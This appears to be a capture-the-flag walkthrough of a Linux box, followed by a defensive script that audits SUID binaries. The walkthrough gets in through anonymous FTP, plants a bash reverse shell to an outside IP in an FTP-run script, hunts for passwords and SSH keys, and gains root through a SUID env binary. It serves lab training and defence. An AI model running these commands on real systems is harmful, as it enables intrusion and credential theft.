We got into FTP anonymously, and we got into the SMB share.
There’s a script that runs on FTP that we can edit for a reverse shell.
Reverse shell one-liner (from Reverse Shell Cheat Sheet | pentestmonkey):
bash -i >& /dev/tcp/10.6.62.12/7777 0>&1
We get a shell.
sudo -l
grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null
history
find / -perm -u=s -type f 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
dpkg -l | grep nginx
getcap -r / 2>/dev/null
env
The SUID search returns a few. Check GTFOBins.
env had it:
/usr/bin/env /bin/bash -p
What he did:
You can get a TTY shell:
Spawning a TTY Shell | SecWiki (zacheller.dev)
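
From the defender's side, the SUID bit on env found above is exactly what a routine audit should catch. The following is an added example, not part of the original notes: the function names, the RISKY_SUID list and the baseline file format (one absolute path per line) are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: defensive SUID audit. All names here are illustrative.

# Constructed short list of programs that can launch arbitrary commands and
# therefore should never be SUID (env is the one from this writeup).
RISKY_SUID="env bash sh dash find vim python3 perl awk nmap"

# suid_audit ROOT [BASELINE_FILE]
# Prints one line per SUID file found under ROOT:
#   RISKY <path>       basename is in RISKY_SUID (overrides the baseline)
#   OK <path>          path is listed in BASELINE_FILE
#   UNEXPECTED <path>  SUID file that the baseline does not know about
suid_audit() {
    root=$1
    baseline=${2:-/dev/null}
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        name=${path##*/}
        verdict=UNEXPECTED
        # Exact, fixed-string, whole-line match against the baseline.
        if grep -qxF -- "$path" "$baseline"; then
            verdict=OK
        fi
        # A risky interpreter stays risky even if someone baselined it.
        for risky in $RISKY_SUID; do
            if [ "$name" = "$risky" ]; then
                verdict=RISKY
            fi
        done
        printf '%s %s\n' "$verdict" "$path"
    done
}

# suid_strip PATH
# Remediation for a RISKY finding: drop the SUID bit, keep other permissions.
suid_strip() {
    chmod u-s -- "$1"
}
```

Run `suid_audit /` as root with a baseline captured from a known-good build of the same image, and treat any RISKY or UNEXPECTED line as a finding to investigate before calling `suid_strip`.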